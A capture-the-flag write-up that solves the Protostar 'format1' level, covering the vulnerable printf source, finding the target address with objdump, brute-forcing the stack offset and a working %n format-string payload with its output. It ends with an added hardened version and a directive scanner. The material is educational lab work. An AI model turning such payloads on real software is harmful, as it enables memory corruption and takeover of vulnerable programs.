Protostar exploits format1

Introduction

Protostar exploits are a cool bunch of CTF-type exercises that focus on Linux binary exploits and get progressively harder. An ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/format1 test
testuser@protostar:~$

Exploit

The program should print the message “you have modified the target :)”.

Hint from Protostar: This level shows how format strings can be used to modify arbitrary memory locations.

Sounds like the %n format specifier needs to be used to solve this challenge. It writes an integer, the number of characters printed so far, to a location in the process’ memory.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  printf(string);

  if(target) {
    printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

If we can assign the ‘target’ variable a non-zero value, then the message should be printed.

Another hint from the challenge page is to use the objdump -t option. This command prints the binary’s symbol table. The symbol we want is the reference to the ‘target’ variable and its memory location.

user@protostar:~$ objdump -t /opt/protostar/bin/format1 |grep target
08049638 g O .bss 00000004 target

There we have it, ‘target’ should be located at memory address 0x08049638.

Now we need to construct the exploit format string payload.

The first step is to figure out at which position on the stack the ‘string’ variable is stored.

user@protostar:~$ for i in {1..254}; do echo -e "\n" && /opt/protostar/bin/format1 AAAA%$i\$p-$i;done |grep 0x41414141
AAAA0x41414141-134

I iterated from 1 to 254 to find the first part of the string of AAAA, and it showed up at the 134th position.

I tried to confirm this once more.

user@protostar:~$ /opt/protostar/bin/format1 `perl -e 'print "AAAA" . "%134\\$p"'`
AAAA0x3d4d5245user@protostar:~$

Oops, it didn’t work.

I didn’t have time to investigate too much so I just decremented the position value till I found it again.

user@protostar:~$ /opt/protostar/bin/format1 `perl -e 'print "AAAA" . "%131\\$p"'`
AAAA0x41414141user@protostar:~$

The payload so far

AAAA%131$p

AAAA = start of the string parameter

%131 = Position on the stack where the ‘string’ (AAAA) variable is stored.

$p = This will print out the contents of the memory location at stack position 131.

All we need to do now is replace the AAAAs with the memory location of ‘target’ in reverse byte order and use the %n modifier to write to a memory location instead of printing the contents of the stack position. Something like \x38\x96\x04\x08%131$n

\x38\x96\x04\x08 = ‘target’ memory location in reverse byte order

%131 = Position on the stack where the ‘string’ (\x38\x96\x04\x08) variable is stored.

$n = Write the number of characters printed so far (4, the bytes ‘\x38\x96\x04\x08’) to the destination address taken from the stack position given by %131

user@protostar:~$ /opt/protostar/bin/format1 `perl -e 'print "\x38\x96\x04\x08" . "%131\\$n"'`
8you have modified the target :)

It worked.
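
As an added example (not code from the original post or from Protostar), here is the corrected form of vuln() next to a small scanner that flags the directives used in the payloads above. The names vuln_fixed and scan_directives are hypothetical, and the sample inputs are constructed from the strings shown in the post.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

int target; /* same global as in the challenge source */

/* Hardened vuln(): the input is only ever an argument to %s, so any
 * directive inside it ("%131$p", "%131$n") is printed as plain text. */
int vuln_fixed(const char *string)
{
    printf("%s", string);
    if (target)
        printf("you have modified the target :)\n");
    return target;
}

/* Hypothetical helper for logging or input checks: count printf directives
 * in untrusted text and report whether any of them is %n, which writes. */
int scan_directives(const char *s, int *writes_memory)
{
    int found = 0;
    *writes_memory = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }        /* "%%" is a literal percent */
        while (isdigit((unsigned char)*s)) s++;  /* digits of "N$" or a width */
        if (*s == '$') s++;                      /* positional form, %131$p */
        while (*s && strchr("-+ #0123456789.*hlLjzt", *s)) s++;
        if (*s && strchr("diouxXeEfFgGaAcspn", *s)) {
            found++;
            if (*s == 'n') *writes_memory = 1;
        }
    }
    return found;
}

int main(void)
{
    /* Constructed sample inputs: the two payload shapes from the post. */
    const char *samples[] = { "AAAA%131$p", "\x38\x96\x04\x08%131$n" };
    for (int i = 0; i < 2; i++) {
        int w, n = scan_directives(samples[i], &w);
        vuln_fixed(samples[i]);
        printf("  -> directives=%d writes=%d target=%d\n", n, w, target);
    }
    return 0;
}
```

The scanner is only a reporting aid; the fix is the constant "%s" format in vuln_fixed(), which leaves target at 0 for both inputs.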

Thank you
